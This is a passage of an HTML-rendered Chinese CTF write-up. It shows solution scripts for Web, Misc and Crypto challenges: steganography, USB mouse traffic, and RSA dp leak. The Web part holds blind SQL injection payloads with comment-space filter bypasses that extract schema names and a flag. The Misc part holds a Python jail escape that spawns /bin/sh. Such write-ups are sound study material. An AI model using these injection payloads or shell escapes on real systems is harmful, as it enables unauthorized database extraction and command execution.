class="hljs-comment">#爆所有库名</span><br> <span class="hljs-comment">#temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata))/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)</span><br> <span class="hljs-comment">#爆表名</span><br> <span class="hljs-comment">#temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(table_name))from(information_schema.tables)/**/where/**/table_schema/**/in/**/(select/**/database()))/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)</span><br> <span class="hljs-comment">#爆字段</span><br> <span class="hljs-comment">#temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(column_name))from(information_schema.columns)/**/where/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))>102/**/and/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))<104)/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)</span><br> <span class="hljs-comment">#爆值</span><br> <span class="hljs-comment">#temp["id"] = "(select/**/case/**/when/**/(ascii(substr((select/**/group_concat(f1ag)from/**/`flaaaaag`)/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)</span><br> r = requests.get(url,params=temp)<br> <span class="hljs-comment">#time.sleep(0.05)</span><br> <span class="hljs-comment">#print(low,high,mid,":")</span><br> <span class="hljs-keyword">if</span> <span class="hljs-string">"hello"</span> <span class="hljs-keyword">in</span> r.text:<br> low = mid+<span class="hljs-number">1</span><br> <span class="hljs-keyword">else</span>:<br> high = mid<br> mid =(low+high)//<span class="hljs-number">2</span><br> <span class="hljs-keyword">if</span>(mid ==<span class="hljs-number">32</span> <span class="hljs-keyword">or</span> mid ==<span class="hljs-number">127</span>):<br> <span class="hljs-keyword">break</span><br> 
column +=<span class="hljs-built_in">chr</span>(mid)<br> <span class="hljs-built_in">print</span>(column)<br> <br><span class="hljs-built_in">print</span>(<span class="hljs-string">"All:"</span> ,column)<br></code></pre></td></tr></table></figure><h3 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h3><h4 id="signin"><a href="#signin" class="headerlink" title="signin"></a>signin</h4><p>零宽度字符隐写+emoji-aes。</p><h4 id="py2"><a href="#py2" class="headerlink" title="py2"></a>py2</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">__import__</span>(<span class="hljs-string">'os'</span>).system(<span class="hljs-string">'/bin/sh'</span>)<br></code></pre></td></tr></table></figure><h4 id="ezsteg"><a href="#ezsteg" class="headerlink" title="ezsteg"></a>ezsteg</h4><p>用stegsolve打开图片,在red plane 0通道发现G plane通道有东西。 保存Green plane 0的图片然后用<code>stegsolve</code>的Image Combiner功能进行对比。 发现了前⼀半flag还有后⼀半flag的提示是用QIM量化,步长为20。在github搜索QIM quantization搜到这个网址:<a href="https://github.com/pl561/QuantizationIndexModulation/blob/master/qim.py%E3%80%82%E4%BB%BF%E7%85%A7%E9%87%8C%E9%9D%A2%E7%9A%84%60test_qim%60%E8%BF%9B%E8%A1%8C%E5%87%BD%E6%95%B0%E9%87%8D%E5%86%99%EF%BC%8C%E5%8F%91%E7%8E%B0%E7%BB%93%E6%9E%9C%E9%87%8C%E7%9A%84msg_detected%E5%85%A8%E6%98%AF1%E5%92%8C0%EF%BC%8C%E6%8A%8A%E6%89%80%E6%9C%89%E7%9A%840%E9%83%BD%E6%94%B9%E6%88%90255%EF%BC%8C%E5%86%8D%E4%BF%9D%E5%AD%98%E6%88%90%E6%96%B0%E7%9A%84%E5%9B%BE%E7%89%87%EF%BC%8C%E5%BE%97%E5%88%B0%E5%90%8E%E4%B8%80%E5%8D%8Aflag%E3%80%82">https://github.com/pl561/QuantizationIndexModulation/blob/master/qim.py。仿照里面的`test_qim`进行函数重写,发现结果里的msg_detected全是1和0,把所有的0都改成255,再保存成新的图片,得到后一半flag。</a></p><p>脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">my_test_qim</span>():<br> delta = <span class="hljs-number">20</span><br> qim = QIM(delta)<br> y = cv2.imread(<span class="hljs-string">'./ezsteg.png'</span>)<br> z_detected, msg_detected = qim.detect(y)<br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> tqdm(<span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(msg_detected))):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(msg_detected[i])):<br> <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(msg_detected[i][j])):<br> <span class="hljs-keyword">if</span> msg_detected[i][j][k] == <span class="hljs-number">1</span>:<br> msg_detected[i][j][k] = <span class="hljs-number">255</span><br> cv2.imwrite(<span class="hljs-string">'flag.png'</span>, msg_detected)<br></code></pre></td></tr></table></figure><h4 id="babypcap"><a href="#babypcap" class="headerlink" title="babypcap"></a>babypcap</h4><p>鼠标流量题,CSDN能搜到脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># f=open('usbdata.txt','r')</span><br><span class="hljs-comment"># fi=open('out.txt','w')</span><br><span class="hljs-comment"># while 1:</span><br><span class="hljs-comment"># a=f.readline().strip()</span><br><span class="hljs-comment"># if a:</span><br><span class="hljs-comment"># if len(a)==8: # ⿏标流量的话len改为8</span><br><span class="hljs-comment"># out=''</span><br><span class="hljs-comment"># for i in range(0,len(a),2):</span><br><span class="hljs-comment"># if i+2 != len(a):</span><br><span class="hljs-comment"># out+=a[i]+a[i+1]+":"</span><br><span class="hljs-comment"># else:</span><br><span class="hljs-comment"># out+=a[i]+a[i+1]</span><br><span class="hljs-comment"># fi.write(out)</span><br><span class="hljs-comment"># fi.write('\n')</span><br><span class="hljs-comment"># else:</span><br><span class="hljs-comment"># break</span><br><span class="hljs-comment"># fi.close()</span><br><br>nums = []<br>keys = <span class="hljs-built_in">open</span>(<span class="hljs-string">'out.txt'</span>,<span 
class="hljs-string">'r'</span>)<br>f = <span class="hljs-built_in">open</span>(<span class="hljs-string">'xy.txt'</span>,<span class="hljs-string">'w'</span>)<br>posx = <span class="hljs-number">0</span><br>posy = <span class="hljs-number">0</span><br><span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> keys:<br><span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(line) != <span class="hljs-number">12</span> :<br><span class="hljs-keyword">continue</span><br> x = <span class="hljs-built_in">int</span>(line[<span class="hljs-number">3</span>:<span class="hljs-number">5</span>],<span class="hljs-number">16</span>)<br> y = <span class="hljs-built_in">int</span>(line[<span class="hljs-number">6</span>:<span class="hljs-number">8</span>],<span class="hljs-number">16</span>)<br> <span class="hljs-keyword">if</span> x > <span class="hljs-number">127</span> :<br> x -= <span class="hljs-number">256</span><br> <span class="hljs-keyword">if</span> y > <span class="hljs-number">127</span> :<br> y -= <span class="hljs-number">256</span><br> posx += x<br> posy += y<br>btn_flag = <span class="hljs-built_in">int</span>(line[<span class="hljs-number">0</span>:<span class="hljs-number">2</span>],<span class="hljs-number">16</span>) <span class="hljs-comment"># 1 for left , 2 for right , 0 for nothing</span><br> <span class="hljs-keyword">if</span> btn_flag == <span class="hljs-number">2</span> : <span class="hljs-comment"># 1 代表左键</span><br> f.write(<span class="hljs-built_in">str</span>(posx))<br> f.write(<span class="hljs-string">' '</span>)<br> f.write(<span class="hljs-built_in">str</span>(posy))<br> f.write(<span class="hljs-string">'\n'</span>)<br>f.close()<br></code></pre></td></tr></table></figure><h4 id="forensic"><a href="#forensic" class="headerlink" title="forensic"></a>forensic</h4><p>Volatility hashdump</p><h3 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h3><h4 id="checkin"><a 
href="#checkin" class="headerlink" title="checkin"></a>checkin</h4><p>签到题,直接上脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><br>a =<br><span class="hljs-number">9631670005361998234982649808225984489506338024056702200592851391520</span><br><span class="hljs-number">4024844540469555622671378420860794984950658042831492783861955562369</span><br><span class="hljs-number">1571514215161194613947761984811384149579480986395179616923334686396</span><br><span class="hljs-number">1464392950546233697674024508779088135862120191099869255630921864806</span><br><span class="hljs-number">1409226131514631759925556900619868423867</span><br>p =<br><span class="hljs-number">1772397479946330723163700367177958503809469527323645748555263786917</span><br><span class="hljs-number">7494640588817688783672929857654918650734584203142823924210712356092</span><br><span class="hljs-number">7684315092976659481316206341152868428190256155821018749939785354467</span><br><span 
class="hljs-number">6112482960429296616190152426855278860415557236374173007912427682616</span><br><span class="hljs-number">81522882474858447747878003388616705422171</span><br>c =<br><span class="hljs-number">3124981003034002486770151625321612487379837376292128516032667813037</span><br><span class="hljs-number">3368708545564162489355490838932695325242212478465783024384459580684</span><br><span class="hljs-number">9256422812022701898553861587130501162228906094036586640090856008471</span><br><span class="hljs-number">9498962523321776520567037375918102170844317963453709006654697325297</span><br><span class="hljs-number">2859914381008999790882607671941093099299</span><br>ni = invert(a, p)<br>m = c * ni % p<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(m)))<br></code></pre></td></tr></table></figure><p>P.S.以下题目都只有脚本!</p><h4 id="base"><a href="#base" class="headerlink" title="base"></a>base</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python">s = <span class="hljs-string">'zCN7zTIOntz8zCiPzsQQzCySltr8m9mJyCiMmsQMmPmRzwyPzdfBowzZ='</span><br>b_char =<br><span class="hljs-string">'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/'</span><br>b = <span class="hljs-string">''</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> s:<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(b_char)):<br> <span class="hljs-keyword">if</span> i == 
b_char[j]:<br> b += <span class="hljs-built_in">str</span>(<span class="hljs-built_in">bin</span>(j)).replace(<span class="hljs-string">'0b'</span>, <span class="hljs-string">''</span>).zfill(<span class="hljs-number">6</span>)<br>flag = <span class="hljs-string">''</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(b), <span class="hljs-number">8</span>):<br> flag += <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(b[i: i+<span class="hljs-number">8</span>], <span class="hljs-number">2</span>))<br><span class="hljs-built_in">print</span>(flag)<br></code></pre></td></tr></table></figure><h4 id="random1"><a href="#random1" class="headerlink" title="random1"></a>random1</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span 
class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span 
class="line">96</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># py2</span><br><span class="hljs-keyword">import</span> random<br><span class="hljs-keyword">import</span> gmpy2<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><br>n =<br><span class="hljs-number">144573683990296079611135474661197492569962285163118264304760128514</span><br><span class="hljs-number">378450625043070474838075626723354220121948920313400664358341070757</span><br><span class="hljs-number">676498630899262349227958025807395866103391135742530910291132519036</span><br><span class="hljs-number">950667849498017553807524999532071920009738654477379676790400942232</span><br><span class="hljs-number">810106883328105428161410721145229679023998881</span><br>c =<br><span class="hljs-number">140936410048438311250552166359315531524717850408136878422422753861</span><br><span class="hljs-number">467709727494132943441793325459384490656351395836085596063714127829</span><br><span class="hljs-number">696538515364822908513326788824368390411397265861249839989684310498</span><br><span class="hljs-number">194231709180660320399728106109349119244510966442534818280589033645</span><br><span class="hljs-number">304725341767217060885195904689618851168472021</span><br>res = [<br> <span class="hljs-number">224</span>, <span class="hljs-number">32</span>, <span class="hljs-number">63</span>, <span class="hljs-number">37</span>, <span class="hljs-number">139</span>, <span class="hljs-number">9</span>, <span class="hljs-number">37</span>, <span class="hljs-number">205</span>, <span class="hljs-number">108</span>, <span class="hljs-number">41</span>, <span class="hljs-number">237</span>, <span class="hljs-number">68</span>, <span class="hljs-number">40</span>, <span class="hljs-number">206</span>,<br><span class="hljs-number">48</span>, <span class="hljs-number">112</span>, <span class="hljs-number">239</span>,<br> <span 
class="hljs-number">85</span>, <span class="hljs-number">232</span>, <span class="hljs-number">0</span>, <span class="hljs-number">168</span>, <span class="hljs-number">105</span>, <span class="hljs-number">214</span>, <span class="hljs-number">13</span>, <span class="hljs-number">185</span>, <span class="hljs-number">107</span>, <span class="hljs-number">27</span>, <span class="hljs-number">176</span>, <span class="hljs-number">219</span>, <span class="hljs-number">55</span>,<br><span class="hljs-number">128</span>, <span class="hljs-number">25</span>, <span class="hljs-number">80</span>,<br> <span class="hljs-number">249</span>, <span class="hljs-number">88</span>, <span class="hljs-number">86</span>, <span class="hljs-number">32</span>, <span class="hljs-number">6</span>, <span class="hljs-number">110</span>, <span class="hljs-number">20</span>, <span class="hljs-number">171</span>, <span class="hljs-number">220</span>, <span class="hljs-number">249</span>, <span class="hljs-number">251</span>, <span class="hljs-number">26</span>, <span class="hljs-number">52</span>, <span class="hljs-number">149</span>,<br><span class="hljs-number">234</span>, <span class="hljs-number">60</span>, <span class="hljs-number">145</span>,<br> <span class="hljs-number">126</span>, <span class="hljs-number">25</span>, <span class="hljs-number">207</span>, <span class="hljs-number">5</span>, <span class="hljs-number">42</span>, <span class="hljs-number">0</span>, <span class="hljs-number">199</span>, <span class="hljs-number">155</span>, <span class="hljs-number">56</span>, <span class="hljs-number">142</span>, <span class="hljs-number">199</span>, <span class="hljs-number">37</span>, <span class="hljs-number">4</span>, <span class="hljs-number">76</span>,<br><span class="hljs-number">173</span>, <span class="hljs-number">138</span>, <span class="hljs-number">195</span>,<br> <span class="hljs-number">112</span>, <span class="hljs-number">145</span>, <span 
class="hljs-number">123</span>, <span class="hljs-number">175</span>, <span class="hljs-number">178</span>, <span class="hljs-number">123</span>, <span class="hljs-number">73</span>, <span class="hljs-number">32</span>, <span class="hljs-number">223</span>, <span class="hljs-number">200</span>, <span class="hljs-number">254</span>, <span class="hljs-number">135</span>, <span class="hljs-number">94</span>,<br><span class="hljs-number">156</span>, <span class="hljs-number">97</span>, <span class="hljs-number">67</span>,<br> <span class="hljs-number">252</span>, <span class="hljs-number">31</span>, <span class="hljs-number">179</span>, <span class="hljs-number">245</span>, <span class="hljs-number">231</span>, <span class="hljs-number">90</span>, <span class="hljs-number">60</span>, <span class="hljs-number">77</span>, <span class="hljs-number">63</span>, <span class="hljs-number">167</span>, <span class="hljs-number">33</span>, <span class="hljs-number">136</span>, <span class="hljs-number">40</span>, <span class="hljs-number">210</span>,<br><span class="hljs-number">219</span>, <span class="hljs-number">226</span>,<br> <span class="hljs-number">164</span>, <span class="hljs-number">164</span>, <span class="hljs-number">45</span>, <span class="hljs-number">122</span>, <span class="hljs-number">85</span>, <span class="hljs-number">29</span>, <span class="hljs-number">59</span>, <span class="hljs-number">86</span>, <span class="hljs-number">123</span>, <span class="hljs-number">251</span>, <span class="hljs-number">126</span>, <span class="hljs-number">37</span>, <span class="hljs-number">9</span>, <span class="hljs-number">119</span>,<br><span class="hljs-number">45</span>, <span class="hljs-number">142</span>, <span class="hljs-number">187</span>,<br> <span class="hljs-number">7</span>, <span class="hljs-number">57</span>, <span class="hljs-number">84</span>, <span class="hljs-number">169</span>, <span class="hljs-number">82</span>, <span 
class="hljs-number">192</span>, <span class="hljs-number">244</span>, <span class="hljs-number">191</span>, <span class="hljs-number">62</span>, <span class="hljs-number">62</span>, <span class="hljs-number">37</span>, <span class="hljs-number">25</span>, <span class="hljs-number">160</span>, <span class="hljs-number">141</span>,<br><span class="hljs-number">248</span>, <span class="hljs-number">147</span>, <span class="hljs-number">128</span>,<br> <span class="hljs-number">236</span>, <span class="hljs-number">123</span>, <span class="hljs-number">64</span>, <span class="hljs-number">177</span>, <span class="hljs-number">110</span>, <span class="hljs-number">50</span>, <span class="hljs-number">39</span>, <span class="hljs-number">143</span>, <span class="hljs-number">73</span>, <span class="hljs-number">172</span>, <span class="hljs-number">35</span>, <span class="hljs-number">4</span>, <span class="hljs-number">15</span>, <span class="hljs-number">180</span>,<br><span class="hljs-number">101</span>, <span class="hljs-number">78</span>, <span class="hljs-number">46</span>,<br> <span class="hljs-number">164</span>, <span class="hljs-number">35</span>, <span class="hljs-number">242</span>, <span class="hljs-number">70</span><br>]<br>seeds = [<br> <span class="hljs-number">9999</span>, <span class="hljs-number">1247</span>, <span class="hljs-number">5097</span>, <span class="hljs-number">7717</span>, <span class="hljs-number">7026</span>, <span class="hljs-number">8398</span>, <span class="hljs-number">961</span>, <span class="hljs-number">3156</span>, <span class="hljs-number">1271</span>, <span class="hljs-number">7473</span>,<br><span class="hljs-number">3669</span>, <span class="hljs-number">6716</span>,<br> <span class="hljs-number">7550</span>, <span class="hljs-number">1426</span>, <span class="hljs-number">8065</span>, <span class="hljs-number">351</span>, <span class="hljs-number">738</span>, <span class="hljs-number">4057</span>, <span 
class="hljs-number">877</span>, <span class="hljs-number">4029</span>, <span class="hljs-number">7606</span>, <span class="hljs-number">1822</span>, <span class="hljs-number">7749</span>,<br><span class="hljs-number">7973</span>, <span class="hljs-number">9666</span>,<br> <span class="hljs-number">5927</span>, <span class="hljs-number">7944</span>, <span class="hljs-number">1240</span>, <span class="hljs-number">8960</span>, <span class="hljs-number">443</span>, <span class="hljs-number">6349</span>, <span class="hljs-number">5949</span>, <span class="hljs-number">5913</span>, <span class="hljs-number">2332</span>, <span class="hljs-number">7255</span>,<br><span class="hljs-number">5185</span>, <span class="hljs-number">5504</span>,<br> <span class="hljs-number">3499</span>, <span class="hljs-number">8855</span>, <span class="hljs-number">4183</span>, <span class="hljs-number">8812</span>, <span class="hljs-number">5865</span>, <span class="hljs-number">4147</span>, <span class="hljs-number">5091</span>, <span class="hljs-number">4556</span>, <span class="hljs-number">1968</span>, <span class="hljs-number">5589</span>,<br><span class="hljs-number">2481</span>, <span class="hljs-number">3411</span>,<br> <span class="hljs-number">514</span>, <span class="hljs-number">589</span>, <span class="hljs-number">8078</span>, <span class="hljs-number">9590</span>, <span class="hljs-number">1765</span>, <span class="hljs-number">1009</span>, <span class="hljs-number">4415</span>, <span class="hljs-number">6603</span>, <span class="hljs-number">3978</span>, <span class="hljs-number">9215</span>,<br><span class="hljs-number">5307</span>, <span class="hljs-number">3804</span>, <span class="hljs-number">1141</span>,<br> <span class="hljs-number">6691</span>, <span class="hljs-number">1760</span>, <span class="hljs-number">101</span>, <span class="hljs-number">7008</span>, <span class="hljs-number">6165</span>, <span class="hljs-number">9974</span>, <span 
class="hljs-number">1194</span>, <span class="hljs-number">3665</span>, <span class="hljs-number">7579</span>, <span class="hljs-number">1148</span>,<br><span class="hljs-number">5786</span>, <span class="hljs-number">6175</span>,<br> <span class="hljs-number">1333</span>, <span class="hljs-number">7932</span>, <span class="hljs-number">8217</span>, <span class="hljs-number">9058</span>, <span class="hljs-number">5400</span>, <span class="hljs-number">6527</span>, <span class="hljs-number">6220</span>, <span class="hljs-number">1111</span>, <span class="hljs-number">4265</span>, <span class="hljs-number">208</span>,<br><span class="hljs-number">2191</span>, <span class="hljs-number">9706</span>,<br> <span class="hljs-number">1019</span>, <span class="hljs-number">7249</span>, <span class="hljs-number">7644</span>, <span class="hljs-number">907</span>, <span class="hljs-number">5679</span>, <span class="hljs-number">3335</span>, <span class="hljs-number">3181</span>, <span class="hljs-number">5301</span>, <span class="hljs-number">4977</span>, <span class="hljs-number">2455</span>,<br><span class="hljs-number">724</span>, <span class="hljs-number">4447</span>, <span class="hljs-number">3566</span>,<br> <span class="hljs-number">9161</span>, <span class="hljs-number">1289</span>, <span class="hljs-number">181</span>, <span class="hljs-number">3509</span>, <span class="hljs-number">6305</span>, <span class="hljs-number">8183</span>, <span class="hljs-number">4024</span>, <span class="hljs-number">2630</span>, <span class="hljs-number">131</span>, <span class="hljs-number">1822</span>,<br><span class="hljs-number">8918</span>, <span class="hljs-number">5595</span>, <span class="hljs-number">6849</span>,<br> <span class="hljs-number">2555</span>, <span class="hljs-number">4221</span>, <span class="hljs-number">3023</span>, <span class="hljs-number">5828</span>, <span class="hljs-number">5622</span>, <span class="hljs-number">5812</span>, <span 
class="hljs-number">2378</span>, <span class="hljs-number">746</span>, <span class="hljs-number">3608</span>, <span class="hljs-number">822</span>,<br>
    <span class="hljs-number">4856</span>, <span class="hljs-number">6987</span>, <span class="hljs-number">9977</span>,<br>
    <span class="hljs-number">5289</span>, <span class="hljs-number">342</span>, <span class="hljs-number">5418</span>, <span class="hljs-number">9974</span>, <span class="hljs-number">5291</span>, <span class="hljs-number">6895</span>, <span class="hljs-number">9663</span>, <span class="hljs-number">3642</span>, <span class="hljs-number">2965</span>, <span class="hljs-number">8003</span>,<br>
    <span class="hljs-number">5830</span>, <span class="hljs-number">6373</span>,<br>
    <span class="hljs-number">3394</span>, <span class="hljs-number">8308</span>, <span class="hljs-number">6754</span>, <span class="hljs-number">4843</span>, <span class="hljs-number">2100</span>, <span class="hljs-number">1355</span>, <span class="hljs-number">5166</span>, <span class="hljs-number">601</span>, <span class="hljs-number">9987</span>, <span class="hljs-number">8921</span>,<br>
    <span class="hljs-number">7563</span>, <span class="hljs-number">2250</span>,<br>
    <span class="hljs-number">9056</span>, <span class="hljs-number">2873</span>, <span class="hljs-number">7479</span>, <span class="hljs-number">5508</span>, <span class="hljs-number">109</span><br>
]<br>
<br>
<span class="hljs-comment"># Strip the mask: the seed is known, so re-seeding reproduces the same four</span><br>
<span class="hljs-comment"># randint(0, 255) outputs and rands[i % 4] is exactly the byte XORed into res[i].</span><br>
dp = <span class="hljs-string">''</span><br>
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(seeds)):<br>
    random.seed(seeds[i])<br>
    rands = []<br>
    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">4</span>):<br>
        rands.append(random.randint(<span class="hljs-number">0</span>, <span class="hljs-number">255</span>))<br>
    dp += <span class="hljs-built_in">chr</span>(rands[i % <span class="hljs-number">4</span>] ^ res[i])<br>
dp = <span class="hljs-built_in">int</span>(dp)  <span class="hljs-comment"># the unmasked characters are the decimal digits of dp</span><br>
e = <span class="hljs-number">0x10001</span><br>
<br>
<span class="hljs-comment"># dp leak: e*dp = 1 (mod p-1), so e*dp - 1 = k*(p-1) for some integer k with</span><br>
<span class="hljs-comment"># 1 &lt;= k &lt; e (because dp &lt; p-1). Try every k and keep the candidate p that divides n.</span><br>
<span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, e):<br>
    <span class="hljs-keyword">if</span> (dp * e - <span class="hljs-number">1</span>) % k == <span class="hljs-number">0</span>:<br>
        p = (dp * e - <span class="hljs-number">1</span>) // k + <span class="hljs-number">1</span><br>
        <span class="hljs-keyword">if</span> n % p == <span class="hljs-number">0</span>:<br>
            q = n // p<br>
            phi = (p - <span class="hljs-number">1</span>) * (q - <span class="hljs-number">1</span>)<br>
            d = gmpy2.invert(e, phi)<br>
            m = <span class="hljs-built_in">pow</span>(c, d, n)<br>
            <span 
class="hljs-built_in">print</span>(n2s(m))<br></code></pre></td></tr></table></figure><h4 id="random2"><a href="#random2" class="headerlink" title="random2"></a>random2</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span 
